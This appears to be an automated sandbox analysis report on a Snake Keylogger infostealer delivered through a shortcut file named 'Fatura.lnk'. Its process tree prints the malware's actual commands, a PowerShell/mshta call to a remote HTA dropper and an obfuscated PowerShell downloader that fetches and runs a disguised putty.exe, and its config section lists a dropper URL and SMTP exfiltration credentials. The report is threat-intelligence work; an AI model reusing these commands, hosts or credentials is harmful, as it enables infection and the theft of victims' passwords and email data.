snakekeylogger | 4fd98c69b5b4390092b460cf897a0cda23e7ccf4d72607f11dca06e9faa4ac57

General

Target

Fatura.lnk
Size

1KB
MD5

30b7c40e7d15109c0894baee426f37ab
SHA1

e0e5ee2fc9738953d2f22176c6de38c22fbfc39a
SHA256

4fd98c69b5b4390092b460cf897a0cda23e7ccf4d72607f11dca06e9faa4ac57
SHA512

18ea33405b6b19ab090a7b7c792d75777dfa708ba7bf355a9eec520f69b95e68e1fcdcac2121f9e9ffe6c6b4a9da8262bffcfd122261317dbe3a5d7cade37d04

Score

10^/10

snakekeylogger collection keylogger spyware stealer

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://198.46.174.164/118/try.hta

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
citalmet.com.ar
Port:
587
Username:
[email protected]
Password:
payment@123

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 1 IoCs

resource	yara_rule
behavioral1/memory/4924-206-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger

Blocklisted process makes network request 2 IoCs

flow	pid	Process
1	4556	mshta.exe
3	4800	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
3732	putty.exe
4924	putty.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	putty.exe
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	putty.exe
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	putty.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	checkip.dyndns.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3732 set thread context of 4924	3732	putty.exe	72

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
4076	powershell.exe
4076	powershell.exe
4076	powershell.exe
4800	powershell.exe
4800	powershell.exe
4800	powershell.exe
3732	putty.exe
3732	putty.exe
3732	putty.exe
3732	putty.exe
3732	putty.exe
3732	putty.exe
3732	putty.exe
3732	putty.exe
3732	putty.exe
4924	putty.exe
4924	putty.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4076	powershell.exe
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeDebugPrivilege	3732	putty.exe
Token: SeDebugPrivilege	4924	putty.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 1596 wrote to memory of 4076	1596	cmd.exe	67
PID 1596 wrote to memory of 4076	1596	cmd.exe	67
PID 4076 wrote to memory of 4556	4076	powershell.exe	68
PID 4076 wrote to memory of 4556	4076	powershell.exe	68
PID 4556 wrote to memory of 4800	4556	mshta.exe	69
PID 4556 wrote to memory of 4800	4556	mshta.exe	69
PID 4800 wrote to memory of 3732	4800	powershell.exe	71
PID 4800 wrote to memory of 3732	4800	powershell.exe	71
PID 4800 wrote to memory of 3732	4800	powershell.exe	71
PID 3732 wrote to memory of 4924	3732	putty.exe	72
PID 3732 wrote to memory of 4924	3732	putty.exe	72
PID 3732 wrote to memory of 4924	3732	putty.exe	72
PID 3732 wrote to memory of 4924	3732	putty.exe	72
PID 3732 wrote to memory of 4924	3732	putty.exe	72
PID 3732 wrote to memory of 4924	3732	putty.exe	72
PID 3732 wrote to memory of 4924	3732	putty.exe	72
PID 3732 wrote to memory of 4924	3732	putty.exe	72

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	putty.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	putty.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Fatura.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1596
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://198.46.174.164/118/try.hta'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4076
- - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" http://198.46.174.164/118/try.hta
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    PID:4556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function Gcvyz($LaoDpjBOwMlJ, $zoOJbFmnAS){[IO.File]::WriteAllBytes($LaoDpjBOwMlJ, $zoOJbFmnAS)};function btkgiFtctCpa($LaoDpjBOwMlJ){if($LaoDpjBOwMlJ.EndsWith((PRjCphdW @(36530,36584,36592,36592))) -eq $True){rundll32.exe $LaoDpjBOwMlJ }elseif($LaoDpjBOwMlJ.EndsWith((PRjCphdW @(36530,36596,36599,36533))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $LaoDpjBOwMlJ}elseif($LaoDpjBOwMlJ.EndsWith((PRjCphdW @(36530,36593,36599,36589))) -eq $True){misexec /qn /i $LaoDpjBOwMlJ}else{Start-Process $LaoDpjBOwMlJ}};function TpPUOsyQfXJLytyu($SIBwUUTjUY){$YwaYPEKezmd = New-Object (PRjCphdW @(36562,36585,36600,36530,36571,36585,36582,36551,36592,36589,36585,36594,36600));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$zoOJbFmnAS = $YwaYPEKezmd.DownloadData($SIBwUUTjUY);return $zoOJbFmnAS};function PRjCphdW($QSqHdxV){$tebWTojh=36484;$ghByWgz=$Null;foreach($pTBqGIEAUtLRBpLo in $QSqHdxV){$ghByWgz+=[char]($pTBqGIEAUtLRBpLo-$tebWTojh)};return $ghByWgz};function rWxppxCdlo(){$hYcdAQxQdWFnq = $env:AppData + '\';$LsIns = $hYcdAQxQdWFnq + 'putty.exe'; if (Test-Path -Path $LsIns){btkgiFtctCpa $LsIns;}Else{ $KiwTSpCigEdN = TpPUOsyQfXJLytyu (PRjCphdW @(36588,36600,36600,36596,36542,36531,36531,36533,36541,36540,36530,36536,36538,36530,36533,36539,36536,36530,36533,36538,36536,36531,36533,36533,36540,36531,36596,36601,36600,36600,36605,36530,36585,36604,36585));Gcvyz $LsIns $KiwTSpCigEdN;btkgiFtctCpa $LsIns;};;;;}rWxppxCdlo;
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4800
    - - C:\Users\Admin\AppData\Roaming\putty.exe
        
        "C:\Users\Admin\AppData\Roaming\putty.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3732
      - C:\Users\Admin\AppData\Roaming\putty.exe
        
        "C:\Users\Admin\AppData\Roaming\putty.exe"
        6⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:4924

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

3

T1081

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
b49a31b6e3a6771dbfa29b309842ef4f

SHA1
6b837a896a3008be212e7a3e297859b06b1d22af

SHA256
066845e6408685e957268c1c1bbb2240809c5b5751ae7973235490032eb51d81

SHA512
804d493bfafbe4be906dc9bb760839af0dc1e7ff4e15cec1b75c328b982f797ee5910e045d691138bbf8e5bcaba3fcfe354523acd90be3a6180cdae14af19029

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\putty.exe.log

Filesize
1KB

MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60ea0e17715d9ab9d4112909229f63e6

SHA1
44024f4d36eb26c9e5eead936737eb10748590c9

SHA256
3a6238fe95b68e55f347804fca4367c08e7587120159cd81a8fe0294c5a5c6c4

SHA512
74b6ee5fb7cd414151bef8e1e6dc51801c34432526e81e40e790663effb78873b704c48ca0dae46061aae463dee13820e6a6bc46af7221ffc7efef31350d8680

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0bdmb4xz.ohp.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\putty.exe

Filesize
959KB

MD5
f0cbe408045d492ae41ee92ad7c39bea

SHA1
d25b6f6a20238bcb31b36af044428545160375f2

SHA256
313ad26ae426d1f3293c2d78ed3fde9093661e90dc876246e8703f0a20522a21

SHA512
d7f185553053b7c3cc2742c33800daa0484728f928ebe111fdeb8cf3c85ace7be78392e9ce0ea97d782b85df030a9bf2745470df9424554e8f01a44f4c27b0e3

Download Submit
C:\Users\Admin\AppData\Roaming\putty.exe

Filesize
959KB

MD5
f0cbe408045d492ae41ee92ad7c39bea

SHA1
d25b6f6a20238bcb31b36af044428545160375f2

SHA256
313ad26ae426d1f3293c2d78ed3fde9093661e90dc876246e8703f0a20522a21

SHA512
d7f185553053b7c3cc2742c33800daa0484728f928ebe111fdeb8cf3c85ace7be78392e9ce0ea97d782b85df030a9bf2745470df9424554e8f01a44f4c27b0e3

Download Submit
C:\Users\Admin\AppData\Roaming\putty.exe

Filesize
959KB

MD5
f0cbe408045d492ae41ee92ad7c39bea

SHA1
d25b6f6a20238bcb31b36af044428545160375f2

SHA256
313ad26ae426d1f3293c2d78ed3fde9093661e90dc876246e8703f0a20522a21

SHA512
d7f185553053b7c3cc2742c33800daa0484728f928ebe111fdeb8cf3c85ace7be78392e9ce0ea97d782b85df030a9bf2745470df9424554e8f01a44f4c27b0e3

Download Submit
memory/3732-204-0x0000000007570000-0x000000000760C000-memory.dmp

Filesize
624KB

Download
memory/3732-201-0x0000000005A70000-0x0000000005A80000-memory.dmp

Filesize
64KB

Download
memory/3732-205-0x0000000007520000-0x0000000007548000-memory.dmp

Filesize
160KB

Download
memory/3732-203-0x0000000007410000-0x00000000074B0000-memory.dmp

Filesize
640KB

Download
memory/3732-202-0x0000000006330000-0x000000000633C000-memory.dmp

Filesize
48KB

Download
memory/3732-194-0x0000000000ED0000-0x0000000000FC6000-memory.dmp

Filesize
984KB

Download
memory/3732-196-0x0000000005C60000-0x000000000615E000-memory.dmp

Filesize
5.0MB

Download
memory/3732-197-0x0000000005800000-0x0000000005892000-memory.dmp

Filesize
584KB

Download
memory/3732-198-0x0000000005960000-0x000000000596A000-memory.dmp

Filesize
40KB

Download
memory/3732-199-0x0000000005A50000-0x0000000005A70000-memory.dmp

Filesize
128KB

Download
memory/3732-200-0x0000000005A70000-0x0000000005A80000-memory.dmp

Filesize
64KB

Download
memory/4076-131-0x000002E8C36C0000-0x000002E8C3736000-memory.dmp

Filesize
472KB

Download
memory/4076-125-0x000002E8C2BD0000-0x000002E8C2BF2000-memory.dmp

Filesize
136KB

Download
memory/4076-129-0x000002E8C2B20000-0x000002E8C2B30000-memory.dmp

Filesize
64KB

Download
memory/4076-128-0x000002E8C2B20000-0x000002E8C2B30000-memory.dmp

Filesize
64KB

Download
memory/4800-176-0x000001A873960000-0x000001A873970000-memory.dmp

Filesize
64KB

Download
memory/4800-173-0x000001A873960000-0x000001A873970000-memory.dmp

Filesize
64KB

Download
memory/4800-182-0x000001A873960000-0x000001A873970000-memory.dmp

Filesize
64KB

Download
memory/4924-206-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/4924-210-0x0000000005940000-0x0000000005950000-memory.dmp

Filesize
64KB

Download
memory/4924-211-0x00000000068D0000-0x0000000006A92000-memory.dmp

Filesize
1.8MB

Download
memory/4924-212-0x0000000005940000-0x0000000005950000-memory.dmp

Filesize
64KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads